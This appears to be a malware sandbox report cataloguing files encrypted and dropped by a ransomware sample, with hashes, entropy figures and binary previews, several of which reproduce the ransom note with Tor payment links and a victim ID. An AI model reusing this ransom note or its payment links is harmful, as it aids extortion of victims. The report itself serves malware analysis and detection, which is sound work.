                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\user\Links\Desktop.lnk
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):6.405287219086984
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:+VGEbXtr4ah6EFaIyOE2yHD9yQHe3zK8sevWAVgKTaCB7RZ0cHYIgtyUzYwQmn:xLD2yWvQKzCwgck38fmn
                                                                                                                                                      MD5:CCCCC00B57114BBBD81D52F7BD1FF7CE
                                                                                                                                                      SHA1:181148B2812FE6A0C71A289D15EF922F93E7AAD2
                                                                                                                                                      SHA-256:07A8623163F3C832D6298C81C849D776FA7D6BB7C8D7C8E33FEE4B94AD1A6266
                                                                                                                                                      SHA-512:EFF9E6469BB43213785471BE21AA36B42A25A29ED1A086D809BC16AC052A642387E0FAE27A051F11ED3207EEBC224D24DD256029C8E605D77AFFCE59C6F1D754
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .u,a.h...7....nX.....Z"...<|+....|D.................D...].j0...[.r..._..y..S..7~X...J..R}.}..5..N*Ix.H-..C..o.^?...R...Kw0w.=.'}'b..d....n..M....g...A..q.v]......[....].....g.0.<[.c..c}{5.@.#.....?..yU-3&...r.>..#.:F?.[.....~.[.p..g_X.....h9...>.R.HR..T.f.E.h.....S..1Q!.+=....wF..Zl....m.f1K.:..g.......D)...|...aaO%.Fj..:....CM.w..0ehu.%.SeaQ..h.g.l'.I/n2.....@.Q\?..Cg.o8uzL.<+7..(..V.T.5.......#...%.pM..6..U{..t4.sy!r!.-.P...i...0:|$.-..=X.....j..c..uB..i......|u...mc.......%k.lEc.W. & ).|w..G..W.M...G..#...t- iA.JS6.r..v....S.....T.S[..O ....9lM......&...Q....7D.@..........?..........67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 D
                                                                                                                                                      C:\Users\user\Links\Desktop.lnk.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):6.405287219086984
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:+VGEbXtr4ah6EFaIyOE2yHD9yQHe3zK8sevWAVgKTaCB7RZ0cHYIgtyUzYwQmn:xLD2yWvQKzCwgck38fmn
                                                                                                                                                      MD5:CCCCC00B57114BBBD81D52F7BD1FF7CE
                                                                                                                                                      SHA1:181148B2812FE6A0C71A289D15EF922F93E7AAD2
                                                                                                                                                      SHA-256:07A8623163F3C832D6298C81C849D776FA7D6BB7C8D7C8E33FEE4B94AD1A6266
                                                                                                                                                      SHA-512:EFF9E6469BB43213785471BE21AA36B42A25A29ED1A086D809BC16AC052A642387E0FAE27A051F11ED3207EEBC224D24DD256029C8E605D77AFFCE59C6F1D754
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .u,a.h...7....nX.....Z"...<|+....|D.................D...].j0...[.r..._..y..S..7~X...J..R}.}..5..N*Ix.H-..C..o.^?...R...Kw0w.=.'}'b..d....n..M....g...A..q.v]......[....].....g.0.<[.c..c}{5.@.#.....?..yU-3&...r.>..#.:F?.[.....~.[.p..g_X.....h9...>.R.HR..T.f.E.h.....S..1Q!.+=....wF..Zl....m.f1K.:..g.......D)...|...aaO%.Fj..:....CM.w..0ehu.%.SeaQ..h.g.l'.I/n2.....@.Q\?..Cg.o8uzL.<+7..(..V.T.5.......#...%.pM..6..U{..t4.sy!r!.-.P...i...0:|$.-..=X.....j..c..uB..i......|u...mc.......%k.lEc.W. & ).|w..G..W.M...G..#...t- iA.JS6.r..v....S.....T.S[..O ....9lM......&...Q....7D.@..........?..........67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 D
                                                                                                                                                      C:\Users\user\Links\Downloads.lnk
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1888
                                                                                                                                                      Entropy (8bit):6.903919551098604
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:mKNC4GAVO6eFTpKishIQTikCytGgZwDPzCwgck383:ZNC4GAVAFF7ksoOPzTEg
                                                                                                                                                      MD5:DA0FA886301815F44193258D138551F3
                                                                                                                                                      SHA1:9A90E596BE854F9DADD877600492637AA1C581C4
                                                                                                                                                      SHA-256:5339FD78A432C1C7728341490B34147766DAF23E7B838C1745DE0C7BBC38BC44
                                                                                                                                                      SHA-512:8FFB3E93E463A3CB65B9E9BC1EC3482546BF487FAD5ACD000B6B7831BAAC0646A31D5EBBA9FDE630C0B38852C96B83DCE9BC2A9F2E07D5B1C4757898340EC989
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..Vw... c._u...3..2.n..P\2...o{.Fu....y].C.....Z.....n..].Km..w......~d.....<.....U*.3....g...dr.6.....S;f.E._...K.D.@YAP..W/........(.!DUndX..yY.H.Q.5yO.c..N..,kS).....B.1...5.r...k.......DIL.3...!.h.....1|.....l._.....r..-G....N|.\....UQ..t.8...4.......LaJ.... .c+......Iz?0.....-...(.nU.n....H..BETB....h.P`..A.E..{..jh..'.........D.oj.WP.../...2..!-...-D..xU.Y".....G.n+...J.....1..>@.....L#.~........z......y9..?H<.jD...vF.[...D.u.$....27..->L.O.>...J:....P?...x....k..G...Um.K..;.s...[.w.....XZ..$..k3....#....3{[.sZ6V.A..*C.}C.n.'..a.n.......u...CG.8.7C=..uZ....u.oh.....>.n<^.]e.%..ULfs|a..XV..V.....B.6;.P.t2w....Y..J......H.R.}......7...C.h....V.8...t..@tl.;.....D..Vi..D.(..*..t.$q..a..l.X.XVW.u......A.Lz/.5.3._+!..2...(.&a2....f$3.o~.q..E.;..)i.......D .....E....t....F....H.pi.[....0.s.x.f.u.3..r.L3.8.W8.yb.F..(/ .?h.R.&...n.._yA&.].<WN.r..<xJ{a.uc..*..W0.v...!Pl.l.(E..1.>.%...?N..*q..d....$.x.Z...&......5./..}....../..
                                                                                                                                                      C:\Users\user\Links\Downloads.lnk.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1888
                                                                                                                                                      Entropy (8bit):6.903919551098604
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:mKNC4GAVO6eFTpKishIQTikCytGgZwDPzCwgck383:ZNC4GAVAFF7ksoOPzTEg
                                                                                                                                                      MD5:DA0FA886301815F44193258D138551F3
                                                                                                                                                      SHA1:9A90E596BE854F9DADD877600492637AA1C581C4
                                                                                                                                                      SHA-256:5339FD78A432C1C7728341490B34147766DAF23E7B838C1745DE0C7BBC38BC44
                                                                                                                                                      SHA-512:8FFB3E93E463A3CB65B9E9BC1EC3482546BF487FAD5ACD000B6B7831BAAC0646A31D5EBBA9FDE630C0B38852C96B83DCE9BC2A9F2E07D5B1C4757898340EC989
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..Vw... c._u...3..2.n..P\2...o{.Fu....y].C.....Z.....n..].Km..w......~d.....<.....U*.3....g...dr.6.....S;f.E._...K.D.@YAP..W/........(.!DUndX..yY.H.Q.5yO.c..N..,kS).....B.1...5.r...k.......DIL.3...!.h.....1|.....l._.....r..-G....N|.\....UQ..t.8...4.......LaJ.... .c+......Iz?0.....-...(.nU.n....H..BETB....h.P`..A.E..{..jh..'.........D.oj.WP.../...2..!-...-D..xU.Y".....G.n+...J.....1..>@.....L#.~........z......y9..?H<.jD...vF.[...D.u.$....27..->L.O.>...J:....P?...x....k..G...Um.K..;.s...[.w.....XZ..$..k3....#....3{[.sZ6V.A..*C.}C.n.'..a.n.......u...CG.8.7C=..uZ....u.oh.....>.n<^.]e.%..ULfs|a..XV..V.....B.6;.P.t2w....Y..J......H.R.}......7...C.h....V.8...t..@tl.;.....D..Vi..D.(..*..t.$q..a..l.X.XVW.u......A.Lz/.5.3._+!..2...(.&a2....f$3.o~.q..E.;..)i.......D .....E....t....F....H.pi.[....0.s.x.f.u.3..r.L3.8.W8.yb.F..(/ .?h.R.&...n.._yA&.].<WN.r..<xJ{a.uc..*..W0.v...!Pl.l.(E..1.>.%...?N..*q..d....$.x.Z...&......5./..}....../..
                                                                                                                                                      C:\Users\user\Links\desktop.ini
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1456
                                                                                                                                                      Entropy (8bit):6.4312810699058796
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:Xy1dXqGsAcs1/ikDia7XDu2UVkZlcWQlzK8sevWAVgKTaCB7RZ0cHYIgtyUzz2O2:X6AbuTDl6SlwlzCwgck38XRt
                                                                                                                                                      MD5:D936B5BC141B6F905A7C28C8D3287017
                                                                                                                                                      SHA1:869164219671621414A5159A1BF9EACA91AD587B
                                                                                                                                                      SHA-256:EE4F5410E05BF00193F1ABB9584484C18DC5130A106BB941728C6A240B7B9C46
                                                                                                                                                      SHA-512:A865FA7776FBB40FFFE31B3960F73BC67D96A9C158112C9E6F45F8AE8B70AC13A74D46AB3B8A6B6D15E88B460041054F47F5FC96C0F2A9A24025FA4BABA0393A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..,Q.z....up+rA.r.......@.....%Y......"E.......[....d=..M..GL..yg.... K?..RUV)..V...#......-...?..<..;..z.#..Fm.S......Q....MDo2..:....c..F.&?.B.*.b.X..+}.W...P.....9.M.W,qm.#j&.>=.........,wi...x}3.o..P|...=.3......?....L..}!qT'.A.6J.v..`..S5...i.....X..c.u.gl...M.d......o.}P%...";......Z0e.mx.....b....8x....P....8....'j.8..[..[U...j|o.._........u.R~bl...cl].D.0f..|....}....<...?Yl.{..G.$....C..0E...Vk!.......7..j.......)F.z.."..Z.].... .n9...Hg"}.j't......:.....w..Wm\../...g0.Z..v@6..}Jy%.....yL...b.]...Y......n.z....\4sL...S....wL..`.nu..^.....t.. ..<...5......e.......2..B..Y...../Qm......,N.nn...67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A
                                                                                                                                                      C:\Users\user\Links\desktop.ini.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1456
                                                                                                                                                      Entropy (8bit):6.4312810699058796
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:Xy1dXqGsAcs1/ikDia7XDu2UVkZlcWQlzK8sevWAVgKTaCB7RZ0cHYIgtyUzz2O2:X6AbuTDl6SlwlzCwgck38XRt
                                                                                                                                                      MD5:D936B5BC141B6F905A7C28C8D3287017
                                                                                                                                                      SHA1:869164219671621414A5159A1BF9EACA91AD587B
                                                                                                                                                      SHA-256:EE4F5410E05BF00193F1ABB9584484C18DC5130A106BB941728C6A240B7B9C46
                                                                                                                                                      SHA-512:A865FA7776FBB40FFFE31B3960F73BC67D96A9C158112C9E6F45F8AE8B70AC13A74D46AB3B8A6B6D15E88B460041054F47F5FC96C0F2A9A24025FA4BABA0393A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..,Q.z....up+rA.r.......@.....%Y......"E.......[....d=..M..GL..yg.... K?..RUV)..V...#......-...?..<..;..z.#..Fm.S......Q....MDo2..:....c..F.&?.B.*.b.X..+}.W...P.....9.M.W,qm.#j&.>=.........,wi...x}3.o..P|...=.3......?....L..}!qT'.A.6J.v..`..S5...i.....X..c.u.gl...M.d......o.}P%...";......Z0e.mx.....b....8x....P....8....'j.8..[..[U...j|o.._........u.R~bl...cl].D.0f..|....}....<...?Yl.{..G.$....C..0E...Vk!.......7..j.......)F.z.."..Z.].... .n9...Hg"}.j't......:.....w..Wm\../...g0.Z..v@6..}Jy%.....yL...b.]...Y......n.z....\4sL...S....wL..`.nu..^.....t.. ..<...5......e.......2..B..Y...../Qm......,N.nn...67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A
                                                                                                                                                      C:\Users\user\Links\read-me.txt
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\user\Local Settings\IconCache.db.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):20736
                                                                                                                                                      Entropy (8bit):6.881557567927414
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:JKi0vVviNF2HSBBtn4OiPkksLp2taywlshDjT+Vm/1+cZiTprbJS36+J:J/EVvidBHn4OiP7U8wlshDjT+M/1+cME
                                                                                                                                                      MD5:248379FB2D4CA0E979F8C0D1FB057259
                                                                                                                                                      SHA1:4ACA9D06FBAC4BFD1679C171A1E091AD61839AC2
                                                                                                                                                      SHA-256:1F978F4ABDAB606AA15EC45A1ECEA807ABE22E464E2AD76B439389D12CD6F564
                                                                                                                                                      SHA-512:284E196F105C772A2114E9A39A2B81107EAED1EBBC655ABFE3963BE41FDF1C95931237DBA3585BFB4CA86BBD1BF98497B4FA3050C6E419D051F8AF6EC316E0CE
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: B}....8.T.[..|1$.*...W..RJ...@z......(.'x)b.;.-...Y....&.H..N.&....`.r_Y....F.....'&.E.t.......I.....P.)SX../...h....._.Y..{c.i&..8-j......<.Ok6L........jF..(...4..""7..!.O'.:..z...$...l2.>...8W.j.MW....J.F.k.9...SXS..o..Lm.d.G...."..Av\....{.D4J.<X4.t<....jKW.J.!.....0.D.a.7>..XT."1........N..b.u....T..R..O..6..8U.J. 5.^..F.:....mD...l...u....W...+...u.........I.....{......gM..Hd.o..$.s....OM\...*.?.:M...X..k.....Z.5.]b...G....>J.^.....pzH.......o.Z..*I.GP7.u.u...a........S.}<.F7..N.$ap...L4....=.p1.]gd.!ua..@......&h.......h.&SyEC.q..lb...*.|....(.4u*..sN.m..$..&....'....Wp.Ux..Se#../g7....SBN...#...y.../.=.NC..p.3........@gEp....h...*.a...Z.$...L!.$...Cf.F.hF..YBJ2u.r.D.Bnl......%<.X.o..&(I...w.9......U;u<.g.zaSO.......jH.p....u..#Inaz../$^.....g.z..8..q..{.K@>..|.c"Y.9....OV.....|$h{.l/..t.4$...*+.#+$.k?..4...Vq..#.n....P4..6.`..S`...*=.....E,.,.r.............^*.i...|....O..i..u..A/.H.....`.`.....+...nrX....E.2.....$...p.`.....2.3MX>U...
                                                                                                                                                      C:\Users\user\Local Settings\Temporary Internet Files\Low\IE\X2GCHJOK\BB19x3nX[1].jpg.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):7904
                                                                                                                                                      Entropy (8bit):7.8801209205532645
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:YwiesPVsiW31CTgkj5O2Th+2AX0Y+7ybA2JQgj:YJvW3Ac25Ox2e0Y+7Baj
                                                                                                                                                      MD5:DE4C7AC34B6099D983E25B64A7B1375B
                                                                                                                                                      SHA1:24430677EE64D24B488BEECD017714F83B402C0B
                                                                                                                                                      SHA-256:8A6EFBA86C1D542EBC1FB9963C54DA53C896A1EE5FB77F04600359DF32A792A0
                                                                                                                                                      SHA-512:EA0376C890E73300ABF3BC0E9A1896ACFD1DE62E7B5E77B7FB1F928DDD642A003CF3B4D166B52C2EBC1AD161ACA36D0891F9B215ED88F6B0FAB46A683DBF31C5
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..2.:...L=:.t....."-{.....A.....`"3.3.N.(...*D`DG;...`.|G....E|..%..4..sX.g.f..f?....1..1fA.1.H.`....M...#'...V......5.....b..'.sf.....1+..(...s.=/$...x......V.Z./...7...t........u.Z..0.lP6..4,...@n\../..........*$3.}.rb...p\>Z.h..)>.M...=|..tF..R..&.....Y..I...t..%tj.,.u:T$.W.].i.Q.M.%....{...p.m.[F:V..Vz..YEI......$1[.L......N".r.......9.(....Ji..2...%f...k...Yi.&.B...P. ]..Z.tcS(....~.@/j.......X.a....M.Q.U6..p..7...y.@k...uY....@[.(.q.[.TIXo....7`...MS...Y...F..`(..............!..o..X%.....e?..m.....S.v7..u....%p...:..`.FA.Q.e).\V"..q...hT...a....>G....AP..|.P...J. ..,K[.dU(.N5t@6.|@....ix.Hh.s^...G..d.XSk.\.4..w....t..Y.....Y..m.w.!.uK...k.+...4?...P.........._)~K.Q...Z.CL........&9........}x.f.U...j.z....g.Q...c8.$...........L(......~...N.....z......q1.o...v@..'tN.6....yEl....o....DeS1...P...3u..9..TTJ........1..,0b.. p...o.'..X.....}.U@F.V.k...K.=.h..g.T....srT2..!.\......Rk...3....=r..Y..ILD]...^....q\.<N22mN.W. 4B..3Co.&.}t..
                                                                                                                                                      C:\Users\user\Local Settings\Temporary Internet Files\Low\IE\X2GCHJOK\BB19xGDT[1].jpg.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):8576
                                                                                                                                                      Entropy (8bit):7.8946193168062
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:pn7oFzg/ibFseH/df2M7NbM9mX2eOrG95nddbpl60:pn7Gg/Yio8M7Ng9mrOahA0
                                                                                                                                                      MD5:46358B65AE97637268EB80BF778F0B1A
                                                                                                                                                      SHA1:417D3236C72B152EE10F0B470A928ECC55D4E473
                                                                                                                                                      SHA-256:6A0344DC8E2C1D6440A1F0ED09A10A9EDF72B121D45C4C0A3AB456B8587123EC
                                                                                                                                                      SHA-512:A0435F7A368A863B425CA45F118A4E88CAF0DEED79C8D666F6B730EB992EF8F733DA30B6E30234739D6E99BD70AF29C54AD4EF1101E5D8F8B45BCB27C42DD8FE
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: \.....=.....zf.d...0.[T.V.S.....W...........RT.#....{..S.[...rMR.i.?puWd.{.Ph.p.`...V..q]......6y.....rD.H...C........V.BHy6" X..O./.s.....,.z....h...dUH...df......o...7.q..r.O..P..[9_..h....RD...K.....0...@.j.5..k.T\.....S..g...N.m).@.A...HLp..&.n...m.u.....d.!...Z...F..x....kK'...P....~i@..D$...Z..S.3.Z.RB`.?.....`.......y...8.B+*K.......q@ ^|.......9A..2...^R.a.R.W........"}}.9..\..........7....S7..s..k,#".. .gHG~k.;7'.....W....9gdl...=.|&...W9Xi....k.o.-..5.W..........{.A.}......EO.|.Q&V5.y..PH^..H7[]..}.....\?.1..w.........!.._4.VWY|h..;.:...$...@...+.g.F...zR.......*P*.j.+...1...!,.h...r.C...l..C.t/..~...s..d@....\rn.m...5<P...;.0.....JG.26..@....7.....\..1U..... .......WnB.."...hb .H+...JW...............q.#^..v.5"+8..<_..........\..gbB.).dT9.@k.......4.=.`g..8..6A.m|.~.H}FSK.IE$..../....."....8*Xx.`V3.T....M....|M..I.d...w8...8...F...a.9.....j`...(...n.9C7..'O.,..+.\..6}.......]..=9...kS.L.9..*...n.%._[...5....
                                                                                                                                                      C:\Users\user\Local Settings\Temporary Internet Files\Low\IE\X2GCHJOK\BB19xaUu[1].jpg.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):8608
                                                                                                                                                      Entropy (8bit):7.889460004786484
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:UXIR6GgIcxDID8IexKMrVXQ4pVJESrsXJibWH1hjdXCCo4G:UXIR6XTIDtexKsVJQgSVhhCcG
                                                                                                                                                      MD5:29C05F62F849582312291D6CF7FCFFF9
                                                                                                                                                      SHA1:95A1DDEEA165B42DDB75CA8F016746211F0D4E99
                                                                                                                                                      SHA-256:5A856231007094DC8AE27B33404839885C87CE0E25A032791F907927A8CD0B77
                                                                                                                                                      SHA-512:6A25EB6AD2B579C8DF35EDA9861893CE48CFF39AC7FE36C7C231A36D3A89A231D0CC46E6BC0848797A45BFF8A9C958747967242695060EFE26EAC3130FFDF55F
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: @......T.A...V..FJQ.Ll.{......h.P5..R..c.Y..!...:<w.. ......4.f.M...O\=......r..(.GR...150Y.k..1...|J....H.O....w..^`............(..5i..^...............__.J.....2;.A..1......1%\.....C%9.....P..~_..y.O]".....HP.pc............L.J.*...C.....0..S.IR.u0.q.....K..:.....p...a.X...2.........|..........0)j.#.....9..)#5d.......Mv.;.I..?Jc..S........#..2.{..gb.#\...;.H]..z.. %...%.lja,_.D.N.A.!T.;.\..:..;..fS....l..I...`q..GC]mP!.>..1......<.xEe.~.+x.'.(]......v".}.p...2..f*..G.J..y.O4..3..1c.M.@..}.j....'.Dq ..Z<.9@...b...Z...G..-NE.f|e..h;.d>...;...$4:9;..H.......<.^h\.....3I@.=C,..`...:...d...../g.`.Y...j.@.;..1...."...G..`..#..MI....*..U..;..$.u...R.D....p...~rg. .I...Xof.9....C....#....OT.I..j...t..&..(o5#Z.kEopw.)4[..h.h.~%.zD...M.%...6.m....3.r.......lE..'zqD.....=..-[.%O_h4.}..&...+l.!..x..h.-'.w..j..z.........5.d:.....wl"s..S2....v..r..T$.r.......OR9i..L.Q. ...i.z.3...C]....IXu..r...m}..c{...sY..AP.\Qw...s...?.Q.X.....Y.C.........P..
                                                                                                                                                      C:\Users\user\Local Settings\Temporary Internet Files\Low\IE\X2GCHJOK\BB19xzm6[1].jpg.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):10802
                                                                                                                                                      Entropy (8bit):7.922320434421072
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:GQsC/E75UpAEZm1A+W1KXyG+txyVas8zzVM52fSEopgeFQ/vmKgPOkYSooCVY:GQj/65m01+sCztxyVOIse6/vmKgPQoCa
                                                                                                                                                      MD5:A6774A9DA34CB4D07EB35E2760B0418A
                                                                                                                                                      SHA1:D2E1CD6D785E7CEB1ACA2F80777EDBDE0EDFD437
                                                                                                                                                      SHA-256:5B1A5D37A0A652840560774095DD1523BF646777D70262CFB0DDB54AB97B7161
                                                                                                                                                      SHA-512:B27C9E5EF8674E4BD9AB0150F2952CF5C92EDAD137DBFD44E89E2841572A055944814DBB04706A625F89F2221CB6AE6AA62A214F34A6EB8A1827B2D36B9AC234
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: F.....viE.-.m....T.m....TL.0Y.V.i...mn...BHc5...2`...>..\..F............cB.+{&|PX.../e.pd..+g..&..w8./..v,.M.Je^..z..S.NB.6.4...@....e.......GZ...T....C..+.YC.......~.l........,E...0Jf_.>Y...<....|FL.xP....y.@..:9|...[......n.Co....8.<...z...Z$.wv....".yo!d....>..{..GgS..[./.ax.4.|.T;a...?a+.......Cv.Cx.......S.......i.$....#R..l...G..1.C\1...`..bm...K.q$...._..h....]Z...C.1R..G..U.tm....i..........@#..*,\tC>i..P...6.n.2P.\j..@_......).[..#x5.!......O..zJ.obx@.f..o..&5.@....72F.9......o.(F...I...x.u......t.O.2.s..S....zna.=7'.>.B...h}.Q...'}.DP#q .....d.........f6>....Y{0....>.......c.".>...K...E...3..V..x3P.1..>9....?..k%.c3..f^C.q..|..ZY.8..e.........>Q5..J.L...p...|........P.f....q..a.c....QY4.*U4p .R..../../.;i.`.~..g.7'S.sYfk...;...sg...^D...R.f[.I.....;...S<.>..B.5.es....S.p...w?H6!..}O..m.{5..4...M..\...\.=$.......A.R...o.[..J+..b(..z.b.&\......*..A....JFU.....m......"..@8.!.=,.C...Z........<.^P/.B.j......mr"......8.K_gv.&hS
                                                                                                                                                      C:\Users\user\Local Settings\Temporary Internet Files\Low\IE\X2GCHJOK\BB19yxVU[1].jpg.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
